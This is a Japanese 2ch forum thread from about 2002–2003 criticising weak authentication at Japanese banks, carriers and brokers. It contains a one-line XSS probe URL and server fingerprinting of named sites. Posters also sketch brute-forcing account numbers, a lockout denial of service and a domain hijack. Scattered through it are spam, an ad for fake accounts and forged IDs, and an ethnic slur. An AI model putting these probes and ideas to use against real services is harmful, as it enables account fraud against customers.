)ﾊｧ?
ﾊｧ?
ｧ?
?
ｧ
ﾊｧ
ｧﾊｧ
ﾊｧﾊｧ
）ﾊｧﾊｧ
｀）ﾊｧﾊｧ
Д｀）ﾊｧﾊｧ
´Д｀）ﾊｧﾊｧ
;´Д｀）ﾊｧﾊｧ
（;´Д｀）ﾊｧﾊｧ

春だなぁ。本当に・・・

１＞＞　２CHの皆さん、大変ありがとうございました。
東和銀行のANSER−WEBは、１２月１０日よりお客様に
迷惑のかからないよう３カ月の移行期間を経て、
本日４月１日よりNTTデータの回線を物理的に解約
いたしました。いろいろなご意見をありがとうございました。
なお、５月より試行されるプロバイダー法により、
ここに書き込みされた方の、お名前や電子メールアドレス、
IPアドレス、お名前の請求をいたしますので、その際はご協力を
お願いいたします。国際協定により請求権があることを申し添え
ます。

Operating System and Web Server for www.towabank.co.jp
The site www.towabank.co.jp is running Microsoft-IIS/4.0 on NT4/Windows 98.

OS, Web Server and Hosting History for www.towabank.co.jp
OS Server Last changed IP address Netblock Owner
NT4/Windows 98 Microsoft-IIS/4.0 8-Dec-2000 203.139.139.18 Fujitsu System Solutions Limited.

SSL details for www.towabank.co.jp
Common name: www.towabank.co.jp
HTTPS Server
Microsoft-IIS/4.0
Supported SSL ciphers:

RC4 with MD5
RC4 with MD5 (export version restricted to 40-bit key)
RC2 with MD5
RC2 with MD5 (export version restricted to 40-bit key)
DES with MD5
Triple DES with MD5
Certificate Administrative Details
Valid from: Mar 7 00:00:00 2002 GMT
Valid to: Mar 21 23:59:59 2003 GMT
Serial number: 0x41c36b33ef20dde768196761bb71db35

＞なお、５月より試行されるプロバイダー法により、
＞ここに書き込みされた方の、お名前や電子メールアドレス、
＞IPアドレス、お名前の請求をいたします
法律は過去に遡及適用されないのが原則ですが・・・

みずほ銀とみずほコーポレート銀、CSSの疑いあるみたい。確認してないけど。
http://slashdot.jp/comments.pl?sid=18329&op=&threshold=-1&commentsort=0&mode=thread&startat=&pid=77432#77524

皆様〜教えてほしいんだけど…！！
「心地よい通信」ってどういう通信のことを言うのかな？って思って…
よかったらいろいろ教えてほしい。どういう通信だったら「心地よい」って感じる？

>>533
よど号事件だけだったよね、華々しく遡及したの。
あれは、対策法だったもんな。
オウムの場合は、省令出しただけで法案自体は休眠法だったもんな。

みずほで・・・勝手に・・・　　　　　減ってた･･･

>>537
うを！！！

http://search.yahoo.co.jp/bin/search?p=%C2%E8%BB%B0%B6%E4%B9%D4
http://www.now.or.jp/daisanbank/ ホームページ
http://www.now.or.jp　　　　　　　　　　　　　　プロバイダ
http://www.now.or.jp/daisanbank/anser/anserweb.html　　　　顧客情報流出？？？

SCAN様調査願います（ｗ

www.now.or.jp
inetnum: 210.130.204.0 - 210.130.204.255
netname: CJN
descr: Central Japan Network(Meitetsu Computer Service Co., Ltd.)
country: JP

Operating System and Web Server for www.now.or.jp
The site www.now.or.jp is running Apache/1.3.12 Cobalt (Unix) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP/4.0.3pl1 mod_auth_pam/1.0a FrontPage/4.0.4.3 mod_perl/1.24 on Linux.

OS, Web Server and Hosting History for www.now.or.jp
OS Server Last changed IP address Netblock Owner
Linux Apache/1.3.12 Cobalt (Unix) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP/4.0.3pl1 mod_auth_pam/1.0a FrontPage/4.0.4.3 mod_perl/1.24 30-Nov-2001 210.130.204.197 Central Japan Network(Meitetsu Computer Service Co., Ltd.)
SunOS 4 Apache/1.2.6 PHP/FI-2.0 10-Dec-2000 202.239.96.4 Nagoya Information Center,Ltd
SunOS 4 unknown 9-Dec-2000 202.239.96.4 Nagoya Information Center,Ltd
SunOS 4 Apache/1.2.6 PHP/FI-2.0 8-Dec-2000 202.239.96.4 Nagoya Information Center,Ltd

SSL details for www.now.or.jp

HTTPS Server
Apache/1.3.12 Cobalt (Unix) mod_ssl/2.6.4 OpenSSL/0.9.5a PHP/4.0.3pl1 mod_auth_pam/1.0a
FrontPage/4.0.4.3 mod_perl/1.24

Supported SSL ciphers:
RC4 with MD5
RC4 with MD5 (export version restricted to 40-bit key)
RC2 with MD5
RC2 with MD5 (export version restricted to 40-bit key)
IDEA with MD5
DES with MD5
Triple DES with MD5
Certificate Administrative Details
Valid from: Jul 6 00:00:00 2001 GMT
Valid to: Jul 20 23:59:59 2002 GMT
Serial number: 0x3adc116f83d73710f1927a676d0d7020

http://headlines.yahoo.co.jp/hl?a=20020403-00000010-vgb-sci
困ったもんだ

独自ドメインすら取れない貧乏銀行なんだから潰れるでしょう。

やばいっすよータモさん！

http://www.asahi.com/business/update/0405/008.html
http://www.nikkei.co.jp/news/main/20020405CEEI010505.html

みずほはしばらくはXSSの対応どころじゃないな。
でも、そのすきに世界中のcrackerが...。

「みずほ」って、だいじょぶなんかぁ？
ATM が しょっぱなから利用不能だし、クロスサイトスクリプティング
脆弱性が Office氏から指摘があって、やっとこさ それを認めたようだが、
自動口座振替が二重に引き落とされていた事実が明らかにされていたし、
だいじょぶなの？
長年口座開設の顧客ではあり、電話で問い合わせてみたけど、
　　『ダイジョブデェース！！』
なんて応答があっても、とてもじゃないけど、信用できないなぁ…
とりあえず、「この土日には ATM を停止する予定はない」との
応答があったので、預金はゼーンブ引き出すことにします。

全財産がみずほにありますT_T
引き出せる金は全部引き出しました。
札を3回数えて引き落としも異常無し。ふうやれやれ。
あ……定期はどうしよう？困ったなあT_T

>>549
旧富士や旧勧銀などに、まだ「定期」置いてたのか？！（藁
そんなとこのは、とっくに解約してるぞ。＞自分

相互リンク
http://headlines.yahoo.co.jp/hl?a=20020406-00000001-vgb-sci

ここを参考にしたんだとよ。
http://headlines.yahoo.co.jp/hl?a=20020406-00000001-vgb-sci

【コピペ１周年】４月７日同時多発オーダーIN吉野家【祭り】
(1)馴れ合い禁止。（一人で来る事。同伴禁止：いても知らぬ顔）
(2)「大盛りねぎだくギョク」を頼むこと。（並盛りねぎだくｷﾞｮｸも可）
(3)各会場ごとに指定時間厳守で現地集合。
(4)食ったら即帰る。
注）吉野家は家に帰るまでが吉野家です。

本スレ
http://ex.2ch.net/test/read.cgi/entrance/1017935504/l50
スレよりぬき等
http://www2.mnx.jp/carvancle/yoshigyu/
お祭り板
http://live.2ch.net/test/read.cgi/festival/1014549688/l50

>>551
>>552
ｹｺｰﾝ

ヤフーのニュースにでてました！
リンク返しの技
http://headlines.yahoo.co.jp/hl?a=20020406-00000001-vgb-sci

激しく既出。
謝謝。

　　　　　　　　∩
　＼　　　　　 (　)　　　　　　　　 　 　 　 　 ∩　　　　　　　　 ／
　　 　 　 　 　 | |　　　　　　　　　　 　 　 (ヨ　）
　　　　　(　｀Д)|　　　　　　　　　　　　　　　＼ (Д´　)
　　　　　/⌒ 　 |　 　 ＼ 　 ﾎﾞｯｷｱｹﾞ　／　　 (　　⌒ヽ
＿　 　 <　く＼　＼　　　＼　　　　　／　　　　ﾉ　).ﾉ＼＼＿__
　　　　　＼( ﾖ　､ つ　　　　　　　　　　　　　⊂　　）　　＼ 　 ）　─
　　　　　　 ／ ／/　　　　 ヽ(`Д´)ﾉ　　　　　ω　＼　 　 ￣
　　　　　／ ／ ./　　　　　　 ( ∩ )　　　　　　　ヽ＼ ＼
　／　　（　￣） ￣）.　　　　 ／ω＼　　　　　（￣（￣　 ）　　＼
　　　　　 ￣　 ￣　　　　　　　　　　　　　　　　 ￣　￣

>>551
もうバカかとアホかと＞森山女史

やっぱりみんなYahoo!(びっくりをつけて八田ぞ)のニュース見てきているのね

店番号口座番号ならば、ATM横のごみ箱から拾い放題・・・・・・

倉庫入りしたどっかのスレにチェックデジットの算出ヒントあったよ〜な・・・。
モ○○○１０だっけ？

しっかし、あれほど穴だらけって言われているのにIISをつかうか？

やっぱ「みずほ」＝「白色わい星」でしょう
はやく預金をぜんぶ引きおろすべきかと…
オレは、あしたおろす

>>563
おろした預金がおろしてないことになったりして。

>>555
これって途中で切れてるの?

>102-126
三井住友のOne's Directの暗証カードに
「このカードはキャッシュカードよりも重要なカードです。
絶対に他人に見られないようにしてください
第3暗証番号の場所を○で囲ったりなどは絶対にしないでください」
みたいなことが書いてあったのは、そのためか。

おそらくはＳＭＢＣの連中も危険性は認知できてるんじゃないのかな？
でも残高照会が暗証番号だけでできる危険性は深く考えてなかったのでは



ついでに
以前にソニー銀行に御社はインターネットにおける金銭の取り引きが
可能になってますが、ハッキングなどで預金が勝手に振込みされ残高が減っていた
などの場合どのような保証をしていただけるのでしょうか？

御社の口座は通帳がなく、取り引き明細がインターネット上に表示されるタイプなので
自分の口座残高を明細を証明するすべがありません。
いくらＳＳＬを使用したとしても、完全に安全だとは言い切れないと思います。

みたいなメールを送ったが、全く返信されてこなかった。

>>566
物理的に泥棒とかスキミングに近い行動って、意外と敷居高いですよ。
あと、残高見られても実際の実害、あるのかね。
そう言う意味でしんなまこれ最強。相手のカードに近づく必要もないし、
皮一枚剥いただけで抜き放題。

>>567　暗証番号のわかったキャッシュカードを持つほど怖いことはない。
名前と、暗証番号が知られたら、住所調べられて強盗に遭わないとも限らない。
しかも、相手は残高を知っているから高額な預金をしている人のみを狙うことが
できる。インターネットだけでは何もできないが、バーチャルの世界とリアルの
世界の両方をつかった犯罪は極めて危険。

[みずほ] うあーん!
[カン] どうしたんだい、みずほちゃん。
[みずほ] 全国のみんながいぢめるの〜!
[フジ] 生後まもない幼女をいぢめるとは酷いやつらだな。
[コウ] で、なんでいぢめられてんの?
[みずほ] みずほのろまなカメだから、口座振替に時間がかかって……くすん。
[カン] それは大変だったね。でも泣いてばかりじゃだめだぞ。誠意有る対応が大事だ。
[みずほ] ほかにも誤送金とか、二重引き落としとかもしちゃったの。
[カン] 年度の切り替え時にサービスが集中したせいだな。
[コウ] 二年前に統合発表した時から予測出来た事なんじゃねえのか。
[フジ] 引き落とせなくなるというデマで、休止直前に利用が集中したせいもあるに違いない。
[カン] 実際トラブル出てるじゃねえかよ。
[コウ] みずほだけのせいじゃないよ。
[フジ] そうだ、ロリキャラはドジなほど可愛いものだ。
[コウ] いいのかお前ら。
[みずほ] みずほがんばるから、これからも応援よろしくね。てへ。
[コウ] てへ、じゃねえよ。

http://headlines.yahoo.co.jp/hl?a=20020406-00000002-vgb-sci

http://headlines.yahoo.co.jp/hl?a=20020406-00000001-vgb-sci

＞セキュリティホールの存在の可能性は、掲示板サイト 「2ちゃんねる」内のユーザによる指摘により発見された。

セキュ板マンセー

b

今みずほ銀行にみんなでいっせいにアタックしたら、
もう二度と立ち上がれなさそうだな。

573 = セキュ板の評判を貶めようとする某銀行工作員

>>563 システム統合の混乱よりもクロスサイトスクリプティングのほうが
怖いので、遅まきながら今日窓口で残高引き出してきました。＜みずほ
早くCSS対策もおながいします。

つーかCSS専用スレを立てたほうがよいのでは？

sage

>>577
そういうことはsageてからいえ

>>576
実はコソーリ立てようと思ったんだけど、もうしｂ（以下略

致命的な問題ってほかにはないの？

そんなもんない

サンデープロジェクトに新生銀行社長が出演中
http://money.2ch.net/test/read.cgi/money/1019352539/

age

ジャパンネットバンクってどうよ？

http://www.daisanbank.com
を取得して、ヤフーにURL変更を申請して、第三銀行ホームペ-ジを乗っ取ることできそうね。

＞585
http://www.now.or.jp/

ユーザは、次の URL から自分のアカウントを管理できます
: http://www.now.or.jp/personal/
各ユーザは、次の URL にホームページを作成できます
: http://www.now.or.jp/users/<ユーザ名>/


こんなんが露出するようなトコにWEBページを作る神経が信じられん。

http://www.now.or.jp/daisanbank/

パーチャルホスティングをオンラインバンキングをやってる銀行が使ってるのが理解できない。自社で鯖立てるもんでしょ。普通。

http://www.now.or.jp/
つかこれ、コバルトのデフォページそのまま・・・(;´Д`)

結構多いねぇ（ｗ
http://www.google.com/search?q=%82%B2%8E%A9%95%AA%82%CC%83z%81%5B%83%80%83y%81%5B%83W%82%C6%92u%82%AB%8A%B7%82%A6%82%C4%82%AD%82%BE%82%B3%82%A2%81B&hl=ja&btnG=Google+%8C%9F%8D%F5&lr=

新生は逝ってよしですか？

第三銀行のInternetBanking鯖ですが、
www2.ib-center.gr.jpを使ってます。
これはCAFISのインターネットバンキングサービスかな？

自社ドメインも取らずにnow.or.jpのスペースにWebサイトを作るのは流石に
寒いと思うが、バーチャルホスティングでオンラインバンキングの処理を
やっているわけではないです。

↑CAFISでなくてANSWERかも。（時々混ざるんだ、これが。）
いずれにしてもNTTデータです。

シティで祭の予感

>>593 これのこと？
産経速報 http://www.sankei.co.jp/paper/today/sokuhou.htmlの
10:57 ネットバンキングで不正送金。警視庁が千葉県の会社員逮捕。パスワードを不正入手し顧客の口座から３７０万円詐取。

>>594
シティで働いていた派遣社員だろ

ネット・バンキングに不正アクセス、容疑の会社員逮捕
http://www.asahi.com/national/update/0510/018.html

age

つかまったやつがここの住人だったら笑う。

ＡＮＳＷＥＲではなくＡＮＳＥＲでしょっ

シティーバンクだってね。

http://www.citibank.co.jp/citidirect/d_gaide.html

これを見た限りでは、確かに内部犯行には極端に弱いと思われます。

>>591
日立　ファインマックス

いまどきこんな記事が・・・
「メガバンク・みずほ銀行にトラブル多発」
http://headlines.yahoo.co.jp/hl?a=20020511-00000003-vgb-sci

ネット銀、みずほとったけど、セキュリティが心配です・・・。

ﾔﾊﾟｰﾘ、ネット銀行はそんなものなんですかね。。。

>>599
チミはアホか？

>>606
素人はすっこんでいなさい。
http://www.fjh.fujitsu.com/sei01/

正直スマンかった・・

日比谷ヤフカフェFWいい加減疑惑再燃。

http://money.2ch.net/test/read.cgi/money/1009541607/167-171

海外蹴球板で見つけますた

以前ＳＣＡＮに突っ込まれてヤフは日比谷カフェ専用ＩＰだと
いうことになっているのだが、何故か削除依頼が出ている

新生銀行ﾀｿ fusianasanトラップにひっかかる顛末はこちらから
http://corn.2ch.net/test/read.cgi/football/1021309471/

�@ http://corn.2ch.net/test/read.cgi/football/1021309471/480
↓
�A http://corn.2ch.net/test/read.cgi/football/1021309471/493
↓
�B http://corn.2ch.net/test/read.cgi/football/1021309471/500

(・∀・)ｳﾋ!

http://corn.2ch.net/test/read.cgi/news/1020851500/540
昼間にやふカフェ日比谷からふしあなってみました。
何故かこのスレが呼び出せなかったので速板の雑談スレにカキコ。
ほげげ？

ttp://www.atabok.co.jp/
ココの技術ってどれぐらい信じて良いのでしょう？
営業の話だけ聞くと、くらくら眩暈するほど
すごいことばかり言ってるんですけど。

スレ違いであればスマソ

コンサル屋かな？
システムの話だけして周りの話しない営業はダメだよ。
セキュリティなんて胸張ってできる仕事じゃないんだから。

>>613
とりあえず見てみた。

Operating System and Web Server for www.atabok.co.jp
The site www.atabok.co.jp is running Microsoft-IIS/5.0 on Windows 2000.

OS Server Last changed IP address Netblock Owner
Windows 2000 Microsoft-IIS/5.0 2-Jun-2002 66.37.216.17 Exodus Communications Inc. Boston-3

http://www.dhc.co.jp/../<script>alert('2ch')</script>

>>615　どうやって見るんですか？
教えて厨からの質問です。

>>617
>>221

そろそろほっしゅ。
アパッチ大丈夫ですかー？

古いアパッチ沢山あるよー
やりたい放（以下略）

Trying 64.71.177.66...
Connected to pc.2ch.net.
Escape character is '^]'.
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Thu, 27 Jun 2002 03:27:45 GMT
Server: Apache/1.3.6 (Unix) PHP/4.0.3pl1 mod_gzip/1.3.19.1a mod_ssl/2.3.6 OpenSSL/0.9.3a

(((（ ;ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

＞＞６２１
バナー晒してどうしたいの？？？

旧三和のネットバンク契約番号。
口座番号＋店番号をローテートしてるだけ？
ローテート規則さえわかれば、口座番号から
生成できる。

>>621
1.3.6ベースでパッチ充ててあるらしいよ。

これ、４桁数字パスワード。やばい。信じがたい。
http://au-cs0.kddi.com/customer/login.html

>>625
銀行とは電話会社はスレ違い・・・でもこんなやばいことあうはやってたんだ(怖
電話番号も数字、暗証４桁。

『
オンラインカスタマーサービスはau電話をご利用中の方ならどなたでも利用できるインターネットサービスです。
　・ご利用料金の照会サービス　・各種変更受付　・申込書郵送サービス

au電話番号(半角数字)____________
暗証番号(半角数字)____ 　　　　　　　　　　　＊お申し込み時にご記入いただいた４桁の数字です

　[ログイン] [リセット]

ご利用にあたって
● ご利用の際はお客様の暗証番号が必要です。
間違った暗証番号を入力された場合、当日のご利用ができない場合があります。
※暗証番号とはａｕ電話お申し込み時にご記入いただいた4桁の番号です。
「お申込書の控え」または「契約内容ご確認のお知らせ」にてご確認ください。
● 料金プラン、料金割引サービス、オプションサービスの変更申し込み時に4桁の受付番号を通知します。
弊社での変更登録完了後、eメールにて完了通知をお送りします。
また、当サイトの「変更受付確認画面」でもご確認頂けます。
なお、変更登録が完了するまでにはお申し込みから2〜3営業日かかります。
● ご利用のａｕ電話以外の料金照会および契約内容の変更はできません。
● メンテナンス等によりご利用いただけない場合があります。
● ａｕ電話番号を変更された場合、変更当月の「通話料・通信料照会」はできません。
● 新規加入・機種変更・譲渡・承継・一時休止再利用を行った場合当サービスのご利用は2〜3日後からとなります。
当ページでは、個人情報のセキュリティ確保のために SSL (Secure Sockets Layer Protocol) を利用しています。 』

電話機からの暗証入力なら端末番号が確かだからそこそこ安全だけど、
インターネットでは断然危険。アフォが絶たんなあ（；´Д｀）

>間違った暗証番号を入力された場合、当日のご利用ができない場合があります。

ある番号に１日１回の制限つければサーチ行為は出来ないと考えてるらしいな
1/1000 の確率で同じ暗証番号がいるなんて考えもしないのか。
実際は同じ数字連続、西暦年、誕生月日なんてﾔｼだらけだろうに

>>628 1/1000 => 1/10000

0000 なんてﾔｼも。

>>625は下のスレだったらスレ違いにならないしどこかで記事になる。

クロスサイトスクリプティング
http://pc.2ch.net/test/read.cgi/sec/1004160822/

>>630
(ﾟДﾟ)ﾊｧ?

全日空もかよ！
http://svc.ana.co.jp/amc/signin/index.html

>>625
https://www2.tu-ka-tokai.co.jp/henkou/
ツーカー東海はちゃんと別のＩＤ入力させてて安全になってる。

ＡＵは出鱈目だね。

>>632
ニセーイも
ttps://www.account.nissay.co.jp/BD52/BJ5H002Z.jsp

60分もの無修正アダルトビデオが見放題！

無料サンプルもあります。

閲覧は、ここからどうぞ！ -> http://www.terra.es/personal9/ihb1001

Click here to be removed from a list. -> [email protected]?subject=remove

インチキ証明書でＳＳＬ運用中の信用金庫ハケーン

ソース
http://pc.2ch.net/test/read.cgi/sec/1027170283/921

>>625
PHSの子会社(DDIポケット）も同じようなもんだよ・・・ID＝電話番号、PW＝4桁数字(留守番電話とかと共通）、
たしかログイン3回失敗でアカウントロックになる。
電話番号で無いと面倒だって、クレーム付けるＤＱＮユーザが居るんだとさ・・・(´ヘ｀;)ハァ
ttps://www3.ddipocket.co.jp/telmecall/user/userlogin.jsp

連続カキコスマソ
XSSのスレも見たけど、こちらの方が良いかと思ったので・・・
ＰＷサーチもだけど、電話番号（現在は会社毎にまとめてブロックを割り当ててある）、
そこにスキャンのscript走らせたら、アカウントロックで留守電を聞けないってDoSが成立するんだけどな。

ANSERって残高照会暗証番号と振込振替暗証番号と振込照会暗証番号と
確認暗証番号って別々だと思うのですが、オンラインバンキングで
こういう暗証番号を発行してくれる銀行ってあるんでしょうか?

たいていは振込用の乱数表とかですよね。

>>637

アカウントロックに対抗するにはPWを固定にしてIDを変化させるのが定石だと思うが。

>>640
実際にロックされないと、痛みはわからんじゃないか？
SPAM全盛期、ジャパネット銀行の業者の口座をロック
した強者がいたが、あまり表面化しないんだろうな。
危機管理としては最低だがね。

「○○銀行が危ない」という噂が流れる
　　　　　　　　↓
慌てて口座をチェックしようとするが、ログインできない
　　　　　　　　↓
　　　噂が拡大して取り付け騒ぎ

http://www.imes.boj.or.jp/japanese/kinyu/2002/yoyaku/kk21-b1-6.html

2chのここの掲示板情報のパクリあり。日銀ともあろう機関が・・・

（・∀・)ﾆﾔﾆﾔ

おい！銀行もやばいが証券会社はどうよ？
こことか↓
https://www.daiwa.co.jp/HomeTrade/Account/m8301.html

証券会社の口座番号は本人か証券会社しかわからんからまあ許せるだろ。
すこしセキュリティが甘いとも言えるが。
銀行の場合は振込先を教えるために口座番号は公開を前提にしてるから
4桁の暗証番号と口座番号だけで残高照会とかを行えるだけで極めて危険。
ダイワ証券はまあギリギリセーフだろう。

>>645
なるほどｻｿｸｽ

>>646 なっとくしちゃだめだろ（ｗ

645 はこのスレを頭から読み直ししる。口座番号が公開かは関係ない。
口座番号をぐるぐる回したら突破できるのが見つかってしまう。
これはシンナマのときと同じ危険レベル。
シンナマは改修したようだね。私邸バンクと同じ方式に改良されてる。

口座番号も６桁しかない。。。（(；ﾟДﾟ)ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

せめて追加パスワードが欲しいね・・・

http://www.daiwa.co.jp/
http://uptime.netcraft.com/up/graph?mode_u=on&mode_w=on&site=www.daiwa.co.jp&submit=Examine
OS Server Last changed IP address Netblock Owner
Solaris Netscape-Enterprise/3.6 SP2 24-Nov-2000 202.244.50.193 Daiwa Securities Co. Ltd.

http://poet.daiwa.co.jp/
http://uptime.netcraft.com/up/graph?site=poet.daiwa.co.jp
OS, Web Server and Hosting History for poet.daiwa.co.jp
OS Server Last changed IP address Netblock Owner
Windows 2000 Microsoft-IIS/5.0 17-Jun-2002 202.244.50.52 Daiwa Securities Co. Ltd.
NT4/Windows 98 Microsoft-IIS/4.0 9-Jul-2001 202.244.50.52 Daiwa Securities Co. Ltd.

JNBもログインID=口座番号
しかも直す気まったくなし

穴ﾊｯｹｰﾝのﾏｲｺﾛｿﾌﾄ
IISのﾊﾟｯﾁって大丈夫か?

某Ｍ井証券はIDとパスワードを、一緒の普通郵便で送ってきました。
即刻残高みんな引き上げました。

俺ダイワに口座持ってるよ・・・
取引時認証も暗証番号だからほとんど意味ない。
「ｶｽﾀﾏｰｻｰﾋﾞｽ」からはメールアドレスや電話番号を参照できる・・・
（(((((；ﾟДﾟ)))）ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙﾋｰ

架空口座、架空名義の保険証等激安にて販売しております。

手渡し可能です。

多数注文の場合は値引きいたします。

http://members.tripod.co.jp/ugjap/index-1.html

>>655
？？？

昨年下記のような詐欺サイトを開設して
http://members.tripod.com/~ura_mono/　　　　　　架空物ショップ問屋(2001.08.11HP開設)
http://members.tripod.com/~kakuuyahonpo/　　　　架空屋本舗(2001.08.28HP開設)
http://members.tripod.com/~yamiichi0/　　　　　総合架空モール闇市(2001.09.30HP開設)
詐欺を行っていた詐欺師が、今年も
http://www.geocities.co.jp/WallStreet/9409/　　　架空物屋(2002.08.21HP開設)
http://members.tripod.co.jp/kakuumono/　　　　　架空裏物屋(2002.09.02HP開設)
http://members.tripod.co.jp/kakuusougou/　　　　架空総合問屋(2002.09.23HP開設)
http://www.geocities.com/kakuhonpo/kakuu.htm　　架空本舗(2002.10.05HP開設)
（上4つのHPはすでに削除されている）
http://members.tripod.co.jp/ugjap/index-1.html　架空商品販売所(2002.10.29HP開設)
等の詐欺サイトを開設して詐欺を行っています。

詐欺に遭われた方おられましたら下記HPまで情報をお寄せください。
http://snow.prohosting.com/uramono/

>>657
んな信頼ないところで買うほうがアフォ。
大体フリーページじゃねえか。

age

5月20日　ネット・バンキングに不正アクセス、容疑の会社員逮捕
　インターネット・バンキングの仕組みを使って銀行のコンピューター・サーバーに不正にアクセスし、
約３７０万円を詐取したとして、警視庁は１０日、人材派遣会社からこの銀行に派遣されていた千葉
県、会社員岡部弘容疑者（３１）を不正アクセス禁止法違反（不正アクセス行為）と私電磁的記録不正
作出・同供用などの疑いで逮捕したと発表した。
　調べでは、岡部容疑者は同銀行の顧客２人になりすまし、昨年１０月から今年１月まで、インターネッ
ト・バンキングを利用して２人の口座から知人の銀行口座に計約３７０万円を振り込んだ疑い。ネット・
バンキングを利用するには、ネット上で口座番号と現金自動預入払出機（ＡＴＭ）などで使う４けたの
暗証番号を入力する必要がある。岡部容疑者は派遣当時、行内の顧客データベースを利用して、顧
客の口座番号や生年月日などの個人情報を取得し、暗証番号を探し当てていた。被害者の顧客２人
は暗証番号を生まれた月日にしていたという。［朝日新聞 5月10日］
>>594

>>107
民事不介入って知ってるか？
事件が起こらないと刑殺は動けないし、動くべきではない。

>>137
>正直世界中でこれまで何の問題も起こってないから
氷山って知ってるか？

>>661
予防検束って知ってるか？
犯罪を予告し、実行する恐れのある人間がいるなら事前に逮捕すべきだろ。

>>663 戦前かよ(w

>>663
犯罪を予告した時点で脅迫罪が成立する。

糖蜜ダイレクトの利用者カードの暗証２ケタだけというのは、ちょい甘くないかな。
パスワードも８桁しかないし。
都度振込み禁止にすると、ｅペイメントも使えなくなるし。
公共料金引き落とし用に口座持ってるが、なんか脇の甘さを感じるので、ここのネットバンキングって本格的に使う気にならないな。

そもそも、ネットバンキングを本気で信用してる人って、いんのかな？

>>667
ネットバンキングを申し込んでない人にも危険があるという罠 >>23 >>126 >>411-412

みずほってOS何使ってるん？

野村證券は、パスワード認証のほかにプロバイダー認証や電子証明書認証も用意しているうえ、不特定の口座への送金もできない。
ある程度まとまった金を置くには最強。
銀行には日常生活資金を置く以上のメリットはない。少しは見習ってくれ。もちろんセキュリティ以上に、金融商品の内容もね。

（＾＾）

>>670
誤り

セキュリティ＞商品の程度

>>669
書いてて恥ずかしくないか？調べ方さえ分かってないんだぞおまえ。
自分で恥じ晒してかっこわるいなぁ（ぷ

必死だなｗ

保守

sage

ファミマ・クラブ ユピカード
http://www.jupicard.co.jp/webservice.html#loglog
クレジットカードなのに、数字四桁の暗証で、インターネットWebで認証。
このスレで指摘されている危険あり。

＞ファミマ・クラブ会員番号とユピカードの暗証番号を入力するだけで
＞ご利用いただけます。事前登録の必要はございません。

インターネットを使わない人達もそうとは知らずに脅威に晒されている。

あぼーん

あぼーん

荒らしとして報告しました…

あぼーん

YBBの規制解除されたとたんに、これだからなぁ…

あぼーん

あぼーん

あぼーん

あぼーん

あぼーん

age

荒らしとして既に監視対象になっています…

あぼーん

age

sage

keylogerでネットバンクから金盗んだ奴が逮捕された。
だれかkeylogerのスレ立てて。

http://news2.2ch.net/test/read.cgi/newsplus/1046918621/

>>693
セキュリティ板にはいらん。

ura2ch ura2ch

500人分もPwd抜いたらしいが
転売したというのならわかるが
何だって自分で引き出したんだ？
ｱﾌｫとしか思えん
35歳の自称SEらしいが
最下層のPG崩れ派遣要員かと

あぼーん

小田急の登戸駅で下車して、多摩川沿いを上流に向かうとバラックがいっぱい
あるけど、あれってＢ、それともチョン？

在日の連中。

板違い。どっかよそ行ってやれ。

お断り。多忙につき、週末の土日の日記は更新できない恐れ有り。ご了解下さい。

エースをねらえ！

あぼーん

あぼーん

【ネットバンキング侵入】口座から1600万円盗む
警視庁ハイテク犯罪対策総合センターは6日までに、ネットカフェから外資系銀行のインターネットバンキング
に不正アクセスし、他人の口座から約1600万円を引き出したとして、不正アクセス禁止法違反と電子計算機使用詐欺などの疑いで、
銀行系システム元開発担当者と、窃盗容疑で引き出し役の会社員を逮捕した。
容疑者は、都内や神奈川県内のネットカフェや漫画喫茶など十数か所のパソコンに、キーボードで入力した操作の記録を勝手に取る「キーロガー」
と呼ばれるソフトを仕掛け、利用した人の銀行やオンライン証券取引、電子メールなどに必要なパスワードやクレジットカード番号などの個人情報を入手。
同センターはすくなくとも計719件を盗んだと見て調べている。

あぼーん

このスレ、久しぶりにきたらバカが居ついてるな。ｗ
UFJ銀行のネット騒動の時はおもしろかった。

↑



どうやら靴みんのコピペを知らないバカが1人いるらしい。

コピペやってる香具師をバカと呼んでるんでしょ。

コピペ野郎、いい加減に汁！

>>705
これってやはり○ITIとか○生がやられたのかな。
可変パスワードがあればキーロガーでも一発でやられることは
ないと思うが。

あぼーん

あぼーん

あぼーん

報告しました…

朝日は嫌いだし、第2弾が起きて不思議じゃないと思わない？

あぼーん

あぼーん

この板は、LANや個人のPCへの侵入、トロイ、ウィルス等、
様々なネット上の危険からの防御法や対策を語りあうための板です。
掲示板の荒らし方や侵入の方法、メールボムの送り方等、
攻撃方法の質問はご遠慮下さい。
2ちゃんねるでは荒らし依頼は出来ません。
また、この板ではアタック依頼は受け付けません。
攻撃依頼を見かけた方は、放置してください。
ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

（＾＾）

これから地獄なので、明日の日記はお休みです。

パソコンを遠隔操作してIEが記憶してるパスワードでインターネット
バンキングで金をぬすんだ人いますか

あぼーん

>>717
何が書いてあったんだ？

あぼーん

※　仕事、片づく。ぐた〜〜〜〜り。

あぼーん

あぼーん

あぼーん

あぼーん

age

あぼーん

あぼーん

以前にDDIポケット（PHS)の電話番号IDとPW（4桁数字、留守電と同じPW）を報告した者ですが。
やはりトラブルが起きたのか、お客様番号やらメールアドレスが必要など多少改善した模様です。
最初から、そうしとけっと言いたいですが放置プレイよりはマシなので・・・
https://picnic.ddipocket.co.jp/cgi-bin/1-001.cgi

>>733
以前からの照会機能は、電話番号と暗証番号だけで、変わっていないよ。
https://www3.ddipocket.co.jp/telmecall/user/userlogin.jsp

あぼーん

>>734
練炭、焚いて逝ってきます。

あぼーん

あぼーん

あぼーん

age

あぼーん

あぼーん

あぼーん

あぼーん

age

age

あぼーん

あぼーん

あぼーん

三菱信託みたいにネットバンキングに手を付けないのも、一つの見識？

age

あぼーん

>>750
そだよ、設備投資、維持管理費と利益を考えたら
普通銀行と同じでいいのかと。

ここを毎日チェックしている銀行関係者の方のためにage

age

あぼーん

最近仕事きついよ、いやマジで。。。

>>756
ま、頑張ってくれ。缶コーヒーでも飲みながら落ち着くといいよ

新手の缶コーヒーの宣伝なのか？

756 名前：名無しさん＠お腹いっぱい。 ：03/03/27 07:46
最近仕事きついよ、いやマジで。。。

757 名前：名無しさん＠お腹いっぱい。 ：03/03/27 07:47
>>756
